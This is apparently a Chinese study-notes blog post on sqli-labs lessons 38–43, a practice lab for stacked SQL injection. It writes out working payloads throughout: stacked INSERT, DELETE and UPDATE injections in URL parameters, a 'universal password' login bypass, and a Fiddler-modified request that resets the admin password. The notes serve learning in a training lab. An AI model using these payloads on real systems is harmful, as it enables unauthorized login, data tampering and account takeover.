sqli-labs学习笔记 DAY8
DAY 8
sqli-lab Page-3
sqli-labs lesson 38
- What is Stacked injection?
https://blog.csdn.net/Fly_hps/article/details/80288678 - SQL插入语句:
或者INSERT INTO table_name (column1,column2,column3,...) VALUES (value1,value2,value3,...);INSERT INTO table_name VALUES (value1,value2,value3,...); - payload构建:
?id=1';insert into users values (99,'test','test')--+ - 注:闭合符号、表名以及字段可以通过之前学习的方法获得。
- 结果:
sqli-labs lesson 39
- SQL删除语句:
DELETE FROM table_name WHERE some_column=some_value; - 跟上一题一样,只不过是数值型的参数,我们用delete语句把上次插入的记录删除
- payload构建:
?id=1;delete from users where id=99--+ - 结果:
sqli-labs lesson 40
- SQL更新语句:
UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value; - 利用联合查询或者盲注获得闭合符号、数据库名、表名、字段名等,更新id=1的密码
- payload:
?id=99') UNION SELECT 1,2,3;update users set password='god' where id=1--+ - 结果:
sqli-labs lesson 41
- 跟上一题一样,只不过是数值型注入
sqli-labs lesson 42
- 万能密码:
- 用户名:随意
- 密码:
0' or 1=1;# - 结果:直接登录id=1的账号
- Stacked Injection:
- 抓包:这里用Fiddler
- 改包:密码改为
1';update users set password='test' where username='admin'# - 结果:成功更改了admin账号的密码
- 抓包:这里用Fiddler
sqli-labs lesson 43
- 这一题与上一题一样,闭合符号是’)
Fiddler使用
- 下载与安装:https://www.telerik.com/fiddler
- 界面:
- 抓包:
- 快捷键F12打开抓包(默认为8888端口),
出现该图标即已经打开。 - 抓包结果在左侧。
点击后左侧新增一个记录,打开后可以修改请求。 - 修改完毕,点击
- 快捷键F12打开抓包(默认为8888端口),
posted on
